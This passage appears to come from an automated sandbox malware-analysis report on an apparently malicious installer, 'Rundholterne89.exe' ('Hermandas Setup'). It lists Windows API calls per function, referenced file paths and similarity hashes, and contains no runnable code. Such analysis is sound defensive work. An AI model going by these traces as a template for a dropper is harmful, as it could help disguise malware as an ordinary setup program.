                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                            • GetClientRect.USER32(?,?), ref: 00405131
                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                            • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                              • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040525B
                                                                                            • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                            • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                            • CreatePopupMenu.USER32 ref: 00405310
                                                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                                            • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                            • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                            • EmptyClipboard.USER32 ref: 004053B0
                                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                                            • CloseClipboard.USER32 ref: 00405401
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 590372296-0
                                                                                            • Opcode ID: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                            • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                                            • Opcode Fuzzy Hash: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                                            • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                            • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                            • lstrcmpiA.KERNEL32(C:\Users\user\Stanglorgnet.bro,00429868), ref: 004044B9
                                                                                            • lstrcatA.KERNEL32(?,C:\Users\user\Stanglorgnet.bro), ref: 004044C5
                                                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                              • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Rundholterne89.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\Rundholterne89.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                              • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                            • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                              • Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                              • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                              • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: A$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Stanglorgnet.bro
                                                                                            • API String ID: 2624150263-426964393
                                                                                            • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                            • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                            • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                            • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 0040211D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                            • String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
                                                                                            • API String ID: 123533781-2640575136
                                                                                            • Opcode ID: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
                                                                                            • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                                            • Opcode Fuzzy Hash: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
                                                                                            • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                            • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                                                            • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                            • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                            • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                                                            • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                            • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                                                            APIs
                                                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                                                            • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                                                            • GetSysColor.USER32(?), ref: 0040412B
                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                                            • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                                            • SendMessageA.USER32(00000000), ref: 004041D5
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                                            • SetCursor.USER32(00000000), ref: 00404258
                                                                                            • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                                                            • SetCursor.USER32(00000000), ref: 0040427B
                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                            • String ID: (@@$C:\Users\user\Stanglorgnet.bro$N$open
                                                                                            • API String ID: 3615053054-3917213246
                                                                                            • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                            • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                                            • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                            • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                                            APIs
                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextA.USER32(00000000,Hermandas Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F$Hermandas Setup
                                                                                            • API String ID: 941294808-715303475
                                                                                            • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                            • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                                            • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                            • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                            APIs
                                                                                            • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                                            • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                                              • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                              • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                            • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                                            • wsprintfA.USER32 ref: 00405AEF
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                                            • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                              • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004059A6
                                                                                              • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                                            • API String ID: 222337774-4148678300
                                                                                            • Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                                            • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                                            • Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                                            • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                                            APIs
                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Rundholterne89.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\Rundholterne89.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                            • CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                            • *?|<>/":, xrefs: 00405FE2
                                                                                            • "C:\Users\user\Desktop\Rundholterne89.exe", xrefs: 00405FD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
